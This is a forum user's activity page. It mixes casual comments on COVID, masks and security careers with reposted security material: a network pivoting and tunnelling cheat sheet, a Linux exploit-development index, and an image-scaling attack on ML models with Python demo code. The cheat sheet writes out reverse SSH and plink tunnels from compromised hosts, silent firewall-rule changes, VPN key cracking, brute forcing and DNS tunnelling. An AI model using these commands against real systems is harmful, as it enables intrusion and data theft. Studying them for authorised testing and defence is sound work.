Nytro
Administrator, 18740 posts, 711 days won

Everything posted by Nytro

  1. An elevation of privilege vulnerability exists when Group Policy improperly checks access, aka 'Group Policy Elevation of Privilege Vulnerability'. Source: https://github.com/rogue-kdc/CVE-2020-16939
  2. Network Pivoting and Tunneling Guide
     Written by Sajal Jain, Oct 22 · 2 min read
     This is for purely educational and informational purposes. Only use these techniques where allowed or where you have permission to do so. Power comes with great responsibility.

     Port Forwarding – accept traffic on a given IP address and port and redirect it to a different IP address and port
       apt-get install rinetd
       cat /etc/rinetd.conf
       # bindaddress bindport connectaddress connectport
       w.x.y.z 53 a.b.c.d 80

     SSH Local Port Forwarding: supports bi-directional communication channels
       ssh <gateway> -L <local port to listen>:<remote host>:<remote port>

     SSH Remote Port Forwarding: suitable for popping a remote shell on an internal non-routable network
       ssh <gateway> -R <remote port to bind>:<local host>:<local port>

     SSH Dynamic Port Forwarding: create a SOCKS proxy (ssh -D speaks SOCKS4 and SOCKS5) on our local attacking box to tunnel ALL incoming traffic to ANY host in the DMZ network on ANY port
       ssh -D <local proxy port> -p <remote port> <target>

     Proxychains – perform an Nmap scan within a DMZ from an external computer
     Create a reverse SSH tunnel from the popped machine on 2222:
       ssh -f -N -T -R22222:localhost:22 yourpublichost.example.com
       ssh -f -N -R 2222:<local host>:22 root@<remote host>
     Create a dynamic application-level port forward on 8080 through 2222:
       ssh -f -N -D <local host>:8080 -p 2222 hax0r@<remote host>
     Leverage the SSH SOCKS server to perform an Nmap scan on the network using proxychains (note -sT: SOCKS only carries full TCP connections, so SYN scans and ICMP discovery do not work through it):
       proxychains nmap --top-ports=20 -sT -Pn $ip/24

     HTTP Tunneling
       nc -vvn $ip 8888

     Traffic Encapsulation – bypassing deep packet inspection
     HTTP tunnel (httptunnel), on the server side:
       sudo hts -F <server ip addr>:<port of your app> 80
     On the client side:
       sudo htc -P <my proxy.com:proxy port> -F <port of your app> <server ip addr>:80
     stunnel

     Tunnel Remote Desktop (RDP) from a popped Windows machine to your network
     Tunnel on port 22:
       plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>
     Port 22 blocked? Try port 80 or 443:
       plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P80

     Tunnel Remote Desktop (RDP) from a popped Windows machine using an HTTP tunnel (bypass deep packet inspection)
     On the Windows machine, add the required firewall rules without prompting the user:
       netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
       netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
       netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
       netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
     Start the HTTP tunnel client:
       httptunnel_client.exe
     Create the HTTP reverse tunnel by pointing plink at the local tunnel client on port 3000 (so <remote host> is localhost here):
       plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P 3000

     VLAN Hopping
       git clone https://github.com/nccgroup/vlan-hopping.git
       chmod 700 frogger.sh
       ./frogger.sh

     VPN Overtaking
     Identify VPN servers:
       ./udp-protocol-scanner.pl -p ike $ip
     Scan a range for VPN servers:
       ./udp-protocol-scanner.pl -p ike -f ip.txt
     Use IKEForce to enumerate or dictionary-attack VPN servers:
       pip install pyip
       git clone https://github.com/SpiderLabs/ikeforce.git
     Perform IKE VPN enumeration with IKEForce:
       ./ikeforce.py TARGET-IP -e -w wordlists/groupnames.dic
     Brute-force an IKE VPN using IKEForce:
       ./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1
     Use ike-scan to capture the PSK hash (aggressive mode, -A, is what leaks the hash):
       ike-scan
       ike-scan TARGET-IP
       ike-scan -A TARGET-IP
       ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
       ike-scan -M -A -n example_group -P hash-file.txt TARGET-IP
     Use psk-crack to crack the PSK hash:
       psk-crack hash-file.txt
       psk-crack -b 5 TARGET-IP-key
       psk-crack -b 5 --charset="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134-key
       psk-crack -d /path/to/dictionary-file TARGET-IP-key

     PPTP Overtaking
     Identifying PPTP: it listens on TCP 1723. Nmap PPTP fingerprint:
       nmap -Pn -sV -p 1723 TARGET(S)
     PPTP dictionary attack:
       thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst

     Port Forwarding/Redirection
     PuTTY Link tunnel – SSH tunneling. Forward a remote port to a local address:
       plink.exe -P 22 -l root -pw "1337" -R 445:<local host>:445 <remote host>
     SSH Pivoting – SSH pivoting from one network to another:
       ssh -D <local host>:1010 -p 22 user@<remote host>

     DNS Tunneling
     dnscat2 supports "download" and "upload" commands for getting files (data and programs) to and from the target machine.
     Attacking machine installation:
       apt-get update
       apt-get -y install ruby-dev git make g++
       gem install bundler
       git clone https://github.com/iagox86/dnscat2.git
       cd dnscat2/server
       bundle install
     Run dnscat2:
       ruby ./dnscat2.rb
       dnscat2> New session established: 1422
       dnscat2> session -i 1422

     DISCLAIMER: Everything is gathered from different web resources. Parts of the above write-up belong to unknown authors.
     Written by Sajal Jain, Cyber Security Enthusiast | OSCP | CEH | CHFI | CNSS | Masters of IT (Major: IT Security) & Masters of IT Management from the University of Sydney.
     Source: https://catharsis.net.au/blog/network-pivoting-and-tunneling-guide/
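     The port-forwarding entry that opens the guide (rinetd's "bindaddress bindport connectaddress connectport" line) is the simplest pivot there is: a listener that relays every accepted connection to another host and port, in both directions, until one side closes. As an added example that is not part of Sajal Jain's guide, the following Python script implements that relay directly and exercises it against a constructed loopback "internal" service, so the two-way byte pumping that rinetd, ssh -L and plink -R all perform can be inspected and tested offline. The echo service, the OS-chosen ports and the payload are assumptions made for the demo; the relay itself is a faithful rinetd-style forwarder.

```python
"""Minimal rinetd-style TCP port forwarder (added example, not from the guide).

Accepts connections on bind_addr:bind_port and relays bytes in both
directions to connect_addr:connect_port, mirroring the rinetd.conf line
    bindaddress bindport connectaddress connectport
"""
import socket
import threading


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src -> dst until src hits EOF, then half-close dst so the
    far end sees EOF too (this is what makes 'client closes' propagate)."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _handle(client: socket.socket, connect_addr: str, connect_port: int) -> None:
    """One forwarded connection: dial the real target, pump both directions."""
    try:
        upstream = socket.create_connection((connect_addr, connect_port), timeout=5)
    except OSError:
        client.close()          # target unreachable: drop the client, like rinetd
        return
    back = threading.Thread(target=_pump, args=(upstream, client), daemon=True)
    back.start()
    _pump(client, upstream)     # client -> target on this thread
    back.join()                 # wait for target -> client to drain
    client.close()
    upstream.close()


def start_forwarder(bind_addr: str, bind_port: int,
                    connect_addr: str, connect_port: int) -> int:
    """Listen on bind_addr:bind_port in a background thread and return the
    bound port (bind_port=0 lets the OS pick one, handy for tests)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind_addr, bind_port))
    srv.listen(16)

    def accept_loop() -> None:
        while True:
            try:
                client, _ = srv.accept()
            except OSError:
                return
            threading.Thread(target=_handle, args=(client, connect_addr, connect_port),
                             daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]


def start_echo_server() -> int:
    """Constructed stand-in for the 'internal' service behind the pivot:
    echoes whatever it receives back, upper-cased, so relayed bytes are visible."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)

    def serve() -> None:
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                while True:
                    data = conn.recv(4096)
                    if not data:
                        break
                    conn.sendall(data.upper())

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def demo(payload: bytes = b"ping from outside\n") -> bytes:
    """Send payload through the forwarder to the echo server; return the reply."""
    echo_port = start_echo_server()
    fwd_port = start_forwarder("127.0.0.1", 0, "127.0.0.1", echo_port)
    with socket.create_connection(("127.0.0.1", fwd_port), timeout=5) as c:
        c.sendall(payload)
        c.shutdown(socket.SHUT_WR)          # we are done sending; read until EOF
        chunks = []
        while True:
            data = c.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    print(demo())
```

     The half-close in _pump is the detail worth noticing: a relay that simply closes both sockets when one direction ends truncates replies still in flight, which is exactly the kind of flakiness people blame on the "tunnel" when chaining plink, ssh -R and a SOCKS proxy.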
  3. Linux (x86) Exploit Development Series
     Posted on June 26, 2015 by sploitfun
     First of all I would like to thank the phrack articles, their authors and other security researchers for teaching me about different exploit techniques, without whom none of these posts would have been possible!! I firmly believe that the original reference articles are always the best place to learn. But at times we may struggle to understand them because they may not be linear and may be outdated too. So, to the best of my efforts, I have simplified and consolidated different exploit techniques under one roof here, in order to give beginners a complete understanding of Linux exploit development!! Any questions, corrections and feedback are most welcome!! Now buckle up, let's get started!!
     I have divided this tutorial series into three levels:
     Level 1: Basic Vulnerabilities
     In this level I will introduce basic vulnerability classes and also travel back in time, to learn how Linux exploit development was carried out back then. To achieve this time travel on a current Linux operating system, I have disabled many security protection mechanisms (ASLR, stack canaries, NX and PIE). So in a sense this level is kids' stuff, no real fun happens!!
       Classic Stack Based Buffer Overflow
       Integer Overflow
       Off-By-One (Stack Based)
     Level 2: Bypassing Exploit Mitigation Techniques
     In this level let's get back to the present day, to learn how to bypass different exploit mitigation techniques (ASLR, stack canaries, NX and PIE). Real fun does happen here!!
       Bypassing NX bit using return-to-libc
       Bypassing NX bit using chained return-to-libc
       Bypassing ASLR
         Part I: using return-to-plt
         Part II: using brute force
         Part III: using GOT overwrite and GOT dereference
     Level 3: Heap Vulnerabilities
     In this level let's time travel back and forth, to learn about heap memory corruption bugs.
       Heap overflow using unlink
       Heap overflow using Malloc Maleficarum
       Off-By-One (Heap Based)
       Use After Free
     NOTE: The above list is NOT complete. A few more topics need to be covered. I am working on them, so expect them to be posted soon!!
     Source: https://sploitfun.wordpress.com/2015/06/26/linux-x86-exploit-development-tutorial-series/
  4. Machine Learning Attack Series: Image Scaling Attacks
     Posted on Oct 28, 2020 #machine learning #huskyai #red
     This post is part of a series about machine learning and artificial intelligence. Click on the blog tag "huskyai" to see related posts. Overview: how Husky AI was built, threat modeled and operationalized. Attacks: some of the attacks I want to investigate, learn about, and try out.
     A few weeks ago, while preparing demos for my GrayHat 2020 - Red Team Village presentation, I ran across "Image Scaling Attacks" in Adversarial Preprocessing: Understanding and Preventing Image-Scaling Attacks in Machine Learning by Erwin Quiring et al. I thought that was so cool!
     What is an image scaling attack?
     The basic idea is to hide a smaller image inside a larger image (the larger image should be about 5-10x the size of the smaller one). The attack is easy to explain:
       1. The attacker crafts a malicious input image by hiding the desired target image inside a benign image
       2. The image is loaded by the server
       3. Pre-processing resizes the image
       4. The server acts and makes decisions based on a different image than the one intended
     My goal was to hide a husky image inside another image. Here are the two images I used, before and after the modification: if you look closely, you can see that the second image does have some strange dots all around. But this is not noticeable when viewed at a smaller size.
     You can find the code on Github. I used Google Colab to run it, and there were some errors initially but it worked. Let me know if interested and I can clean up and share the Notebook too.
     Rescaling and magic happens!
     Now look what happens when the image is loaded and resized with OpenCV using default settings: on the left you can see the original sized image, and on the right the same image downsized to 128x128 pixels. That's amazing! The downsized image is an entirely different picture now! Of course I picked a husky, since I wanted to attack "Husky AI" and find another bypass.
     Implications
     This can have a set of implications:
       Training process: images that poison the training data (as pre-processing rescales images)
       Model queries: the model might predict on a different image than the one the user uploaded
       Non-ML attacks: this can also be an issue in other, non machine learning areas
     I guess security never gets boring, there is always something new to learn.
     Mitigations
     It turns out that Husky AI uses PIL, and that was not vulnerable to this attack by default. I got lucky, because initially Husky AI did use OpenCV and its default settings to resize images. But for some reason I changed that early on (not knowing it would also mitigate this attack). If you use OpenCV the issue can be fixed by passing the interpolation argument when calling the resize API so that it does not use the default (cv2.INTER_LINEAR, which for large scale factors only reads a small neighbourhood around each sampling point); an area-averaging interpolation such as cv2.INTER_AREA reads every source pixel and so is not steered by a sparse set of attacker-placed pixels.
     Hope that was useful and interesting. Cheers, Johann. @wunderwuzzi23
     References
       Adversarial Preprocessing: Understanding and Preventing Image-Scaling Attacks in Machine Learning (Erwin Quiring, TU Braunschweig): https://www.usenix.org/system/files/sec20-quiring.pdf
       https://github.com/EQuiw/2019-scalingattack
     Source: https://embracethered.com/blog/posts/2020/husky-ai-image-rescaling-attacks/
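     The attack described in the post above works because a downscaler that consults only a few source pixels per output pixel lets the attacker dictate the output by changing just those pixels, leaving the rest of the image (what a human sees at full size) untouched. As an added example that is not from the post, from Husky AI or from the Quiring et al. code, the following pure-Python script (no numpy, OpenCV or PIL needed) builds a constructed 32x32 benign image and a 4x4 target, crafts the attack image, and shows the attack succeeding against a nearest-neighbour downscaler and failing against an area-averaging one (the computation cv2.INTER_AREA performs for integer factors). The detection heuristic at the end, which flags inputs on which the two scalers disagree strongly, and its threshold are assumptions for illustration, not a tuned detector.

```python
"""Image-scaling attack and a scaling-algorithm mitigation, in pure Python.

Added example (not from the Husky AI post or the Quiring et al. code).
Images are lists of rows of 8-bit grayscale values.
"""
from typing import Dict, List

Image = List[List[int]]


def scale_nearest(img: Image, out_h: int, out_w: int) -> Image:
    """Nearest-neighbour downscale: dst[y][x] = src[floor(y*ky)][floor(x*kx)].
    Exactly one source pixel is read per output pixel; every other source
    pixel is ignored, which is the property the attack abuses."""
    ky, kx = len(img) / out_h, len(img[0]) / out_w
    return [[img[int(y * ky)][int(x * kx)] for x in range(out_w)] for y in range(out_h)]


def scale_area(img: Image, out_h: int, out_w: int) -> Image:
    """Area-averaging downscale (what cv2.INTER_AREA computes for integer
    factors): every source pixel in the ky*kx block contributes equally."""
    ky, kx = len(img) // out_h, len(img[0]) // out_w  # assumes integer factors
    out: Image = []
    for y in range(out_h):
        row = []
        for x in range(out_w):
            block = [img[y * ky + dy][x * kx + dx] for dy in range(ky) for dx in range(kx)]
            row.append(round(sum(block) / len(block)))
        out.append(row)
    return out


def craft_attack_image(benign: Image, target: Image) -> Image:
    """Start from the benign image and overwrite only the pixels that the
    nearest-neighbour scaler will sample with the target's values."""
    ky, kx = len(benign) / len(target), len(benign[0]) / len(target[0])
    crafted = [row[:] for row in benign]
    for y, trow in enumerate(target):
        for x, value in enumerate(trow):
            crafted[int(y * ky)][int(x * kx)] = value
    return crafted


def fraction_changed(a: Image, b: Image) -> float:
    """Share of pixels that differ between two same-sized images."""
    total = sum(len(r) for r in a)
    diff = sum(pa != pb for ra, rb in zip(a, b) for pa, pb in zip(ra, rb))
    return diff / total


def looks_manipulated(img: Image, out_h: int, out_w: int, threshold: int = 32) -> bool:
    """Assumed detection heuristic: if two different scalers disagree strongly
    on the same input, the input may carry a scaling attack. The threshold is
    an illustrative value, not a tuned one (natural edges also cause some disagreement)."""
    a, b = scale_nearest(img, out_h, out_w), scale_area(img, out_h, out_w)
    return max(abs(p - q) for ra, rb in zip(a, b) for p, q in zip(ra, rb)) > threshold


def build_demo(k: int = 8, t: int = 4):
    """Constructed inputs: a flat mid-grey benign image (t*k by t*k) and a
    t by t black/white checkerboard as the image the attacker wants the model to see."""
    benign = [[128] * (t * k) for _ in range(t * k)]
    target = [[255 if (y + x) % 2 == 0 else 0 for x in range(t)] for y in range(t)]
    return benign, target


def run_demo(k: int = 8, t: int = 4) -> Dict[str, object]:
    """Craft the attack image and downscale it with both algorithms."""
    benign, target = build_demo(k, t)
    crafted = craft_attack_image(benign, target)
    return {
        "target": target,
        "fraction_changed": fraction_changed(benign, crafted),  # 1/k^2 of the pixels
        "nearest_result": scale_nearest(crafted, t, t),         # equals target
        "area_result": scale_area(crafted, t, t),               # stays within 2 of 128
        "flagged": looks_manipulated(crafted, t, t),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

     With k = 8 the attacker touches 1/64 of the pixels, yet the nearest-neighbour output is exactly the target, while the area-averaged output moves each block's mean by at most (255 - 128) / 64, i.e. about two grey levels. OpenCV's default INTER_LINEAR is not identical to nearest-neighbour, but for large factors it likewise reads only a 2x2 window at each sampling point, which is why the post's husky appears after a downscale with default settings; any filter whose support grows with the scale factor (area averaging, or an antialiasing resize) removes that leverage.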
  5. Often the authorities don't receive any key and look for alternative solutions. As in the case of the iPhone passcode of someone they had arrested: they did NAND mirroring to crack the PIN. And it will never come to pass (in civilized countries) that the authorities get access to such "keys" (I mean Root CAs), because it would be a serious violation of the right to privacy and could be abused very easily. That is why people and NGOs like the EFF exist, to defend us from such things.
  6. I haven't heard anything more about it.
  7. Admins of what? Which site?
  8. The vulnerability is interesting, but it's a pity it's not very practical: "The issue occurs when a sysadmin inserts an entry into the sudoers file, for example: jacob myhost = (ALL, !root) /usr/bin/chmod"
  9. You stress too much about these attacks on encryption protocols. Almost all of them are well implemented by people who know what they're doing, and if attacks are available, like those on TLS, they can be exploited ONLY under who knows what conditions, or data can be obtained with who knows what supercomputer. As for classic TLS and classic PKI, where there are many Root CAs, simpler and more effective things can be done there. That is, if someone really wants to target somebody, they won't bother with attacks on WhatsApp, Signal or Telegram when they can at least try simple attacks on TLS that require access to a Root CA. But the victims can catch on to this; there have been "suspicious" companies that wanted to become Root CAs, and the attack requires access to a Root CA... But the result can be access to all applications, mainly browsers, that don't implement SSL/TLS pinning. And even banking apps do this. And it has no result when it comes to end-to-end encryption. For "high profile" targets, iOS/Android exploits are bought for millions of dollars.
  10. Sure, if you hand them the phone with the messages. All they have to do is find the WhatsApp app and open it.
  11. By that "Gigel" I was referring to the Twitter account of https://twitter.com/Dredekia who had commented on that post. Ok, marxism, neo-marxism, fascism, anti-fascism, whatever it is. Who gains, and what exactly? What is actually wanted? What big interests are at stake? In the same way I can say about myself that I'm coming with my ideas to provoke nytroxism. I have big interests at stake.
  12. Ok, I see a tweet from the WEF (irrelevant what it is in context, I didn't know about it anyway) and some Gigel on the internet saying something about a "global reset". Honestly, I haven't heard about this; tell us briefly what it's about and what connection it has with Covid, I really don't know. I just think someone called God's IT Support, told them about the problem, and IT support said "Did you try to reset it?", and that someone wants to reset the Earth.
  13. Oh, I didn't even know that's from them too.
  14. FAQ here: https://www.who.int/influenza/human_animal_interface/avian_influenza/h5n1_research/faqs/en/ Cercel (or whoever wrote that article) forgot to take into account the mode of transmission, but the death rate is high. In time we'll find out everything.
  15. I saw this on someone's LinkedIn; apparently this exists: https://lege5.ro/Gratuit/gmztknrygq2q/lista-certificarilor-profesionale-agreate-pentru-efectuarea-testelor-de-penetrare-ordin-553-2019?dp=gi4dqmzyhe2tkoa I'm shocked, I wouldn't have expected something like this to exist in our legislation. Actually, is it in the legislation? And look at the good part: CEH isn't on it
  16. @shitshow - I see it's a conspiracy theory, but I don't have time to inform myself about useless things; instead of copy/paste, write briefly what it's about, I don't really understand. @gigiRoman - Ok, so 250,000 Romanians die annually. From Covid as many again would die, so we'd reach 500,000 deaths per year. Understood. Yes, the economic impact is bad for everyone. There's nothing we can do... And whether it's about reducing the number of cases or about reducing the economic impact, the result is the same: there is no solution that completely solves these problems. There are too many "unknowns" and we depend on too many things, mostly on "people".
  17. Yes, it's very important. When I went to interviews, the people interviewing me:
     1. Knew of me from the forum and from presenting at Defcamp
     2. The person I talked to told me they followed me on Twitter (other people there also knew of me)
     3. Knew me because I had presented at OWASP and Defcon + Github (NetRipper)
     4. I had met one of them at a conference and they knew a bit about my presentations/blog/RST/projects
     It matters a lot. You have to demonstrate what you know; there's no point putting in your CV that you know thousands of things if you don't demonstrate them, just as if you applied for a web designer position and said you'd made hundreds of sites but didn't show any. PS: At pretty much all the companies I've worked for I've taken part in hiring interviews for new positions. Forum activity, presentations, tutorials, tools have always been a plus in my eyes. If you like the field, you'll end up doing something. As the Dinamo supporters said in a message: "Passion > Reason".
  18. Hi and welcome! The bug bounty side doesn't work as well as in the past because there are an extremely large number of people doing it, from all over the world. And besides that, many of them do it "non-stop", meaning maybe more than 8 hours a day. Many are idiots who only report garbage, but there are also many good ones who make a lot of money. I don't recommend it as a "career", for the simple reason that it's not something stable. At least not at the beginning. It's better to have a job with a stable income and do bug bounty in your free time. Then, if things go well, you can quit the job to do bug bounty full time. The problem is that you wake up one day with no money left and... you don't find anything, and that's how the pressure and stress appear. Ah, yes, of course, for success in this you have to do it on private programs or on programs that thousands of people haven't already jumped on. As for the job, like any other job, it's harder at the beginning. On the dev side too it can be hard to find the first position; don't give up and "show what you can do" in your CV. Do bug bounty, do projects, do some research, write a tutorial, anything. It'll look good on the CV. Many companies look for people with experience because they need results quickly. At the company I work for we had the same need, for someone senior to come in, stay a week and then bam, to work, alone, without help. But there are also companies that aren't in this "hurry"; you just have to be patient and stand out from other people, demonstrating what you know directly from your CV. PS: I hope you put in your CV what you told us above.
  19. The crisis won't disappear soon, not even at the start of next year, including if a good vaccine appears. The statistics you want don't exist and never will. To have everything by the book you'd have to test the whole population, see what job everyone has, how they travelled, how many people they met, how many people they talked to for x minutes and who knows what else. I don't know what I did last week... You have the available statistics here: https://datelazi.ro/ Out of 210,000 people, 6,400 died. If Romania has a population of 21,000,000, it means that if all Romanians got infected, 640,000 people would die. Six hundred and forty thousand. Well, that's only theoretical, of course, since there are many asymptomatic people who don't even know they were infected. But it would still come to 210,000 deaths (let's say). That is, 1%. That means of my 300 "friends" on Facebook, 3 die. That means of 500 active users on the forum, 5 die. Does that seem like a small number to you? Not to me. I don't think that many Romanians die of the flu. In fact, that's clear. And that's with X measures in place that people keep complaining about. Ah, I hope you don't start with X people dying annually of cancer, or I'll have a heart attack...
  20. Example of a well-designed protocol: https://signal.org/docs/ Or the one used by Telegram: https://core.telegram.org/mtproto Discussion comparing the two: https://crypto.stackexchange.com/questions/31418/signal-vs-telegram-in-terms-of-protocols
  21. I wore a mask on Saturday too, continuously, 09:00 - 19:00, and absolutely nothing happened to me. My example was an analogy, not a joke.
     1. The consequence is that you don't piss on the other person, who is innocent
     2. Those "few" are very many and they don't know they're pissing on themselves. And they piss often, too
     3. Because they don't have space suits and it's not guaranteed they can't get infected. A doctor who got infected said he had only taken off his equipment in the undressing room and caught it from there, but it could have been caught in a million other places, including the hospital (which is an enclosed space with dozens of confirmed positive people) and outside the hospital (shop, bus etc.)
     I haven't seen anyone hounded or scared because they wear a crappy piece of paper/cloth over their mouth. I haven't seen police chasing anyone either, and I haven't had a problem with absolutely anything since this crisis started and I've been wearing a mask. Actually it's good, people can't see how ugly I am. (Joking, I'm handsome) Edit: I think many people don't really believe in this virus and its seriousness because they don't personally know infected people. Put down your laptops and talk to people. I personally know at least 10 people who have been infected, and over the weekend I found out about another 4-5. Relatives. Some had milder symptoms, others... not really.
  22. Great, details for applying are here: https://rstcon.com/cfp/
  23. About this mask nonsense... Let's do an experiment. Two people meet. And they piss on each other, literally. One with trousers on, the other without. What happens? The same questions apply: what happens if both people have trousers on, or if neither of them does? Same with the mask. You don't need a medical degree to understand that if you wear something over your mouth and talk (with spit, for example), cough or sneeze, whatever you have on your face helps you not pass on what comes out of your mouth. Damn, it's as if you grew up in trees.
  24. Hi, what's the end result? I mean, what do you want to achieve through such an "operation"? Get access to some two-bit servers through which to (D)DoS who knows what other two-bit server? Things have evolved. In general, weak passwords can still be found, but I don't think as commonly as in the past. Moreover, to take down a more serious server you need more than 5-6 crappy VPSes. I'd like to believe this isn't practiced anymore, that we can do better. At least those who do this put ransomware on servers and "make a buck". With that DDoS you accomplish nothing. But even so, the "interesting" systems don't have the dictionary "admin:password", so it's wasted effort. Something slips through now and then, from year to year, it happens, but if this worked the news would be full of such things. Come on, be serious.
  25. I'll believe you if you give me a web archive link from a date before 2020. I don't care what the WHO or anyone else says. A document DATED 2017-2018-2019 can convince me. Let me tell you a secret: I'd been telling you about Covid since 2010, but nobody believed me